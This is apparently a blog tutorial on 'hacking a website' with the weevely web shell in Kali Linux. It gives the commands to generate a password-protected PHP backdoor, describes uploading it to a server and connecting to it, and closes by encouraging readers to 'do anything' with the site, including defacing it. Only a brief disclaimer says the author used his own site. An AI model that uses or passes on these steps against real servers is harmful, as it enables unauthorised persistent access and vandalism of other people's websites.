Hello, Friends. I am Patel Mubassir. Today we are going to learn how to Hack website using weevely in Kali Linux 2018.1. Before starting anything let me introduce to weevely.
What is Weevely?
Weevely is a web shell designed for remote server administration and penetration testing that can be extended over the network at runtime with more than 30 modules.
It executes remote code via an obfuscated PHP agent located on the compromised HTTP server. It fits both web administration and penetration testing post-exploitation scenarios to maintain access, provide situational awareness, escalate the privileges, and move laterally in the network.
How To Install Weevely In Kali Linux 2018.1?
Generally, Weevely preinstalled in Kali Linux. You just simply enter the weevely command in Terminal. You will see something like below Terminal Picture. Or You can Git Clone from Here.
root@D4rk5h4d0w:~# weevely [+] weevely 3.2.0 [!] Error: too few arguments [+] Run terminal to the target weevely <URL> <password> [cmd] [+] Load session file weevely session <path> [cmd] [+] Generate backdoor agent weevely generate <password> <path>
First, we have to generate a PHP backdoor using commands. Let’s Generate a PHP Backdoor with password Protected. As we can see PHP backdoor Shell generate with Password 12345.
Read This: Top 10 Wifi Hacking Tools in 2018
root@D4rk5h4d0w:~# weevely generate 12345 /root/Desktop/phpShell.php Generated backdoor with password '12345' in '/root/Desktop/phpShell.php' of 1459 byte size.
Now, We have to upload this shell on the website. I have my own website, so I am going to upload this shell on my website. Okay, I already uploaded shell on my website. Let’s Try to connect using weevely. Now, In this Step, we have to just pass the PHP shell URL and Shell Password.
That’s All. Now, we got the Shell. Now, you can do anything with this fucking site even You can simply Deface this site :). That was mine site on which was uploaded the shell. You can Watch the video for better understand.
Note: This is only for demonstration purpose. And I had used my own website for demonstration.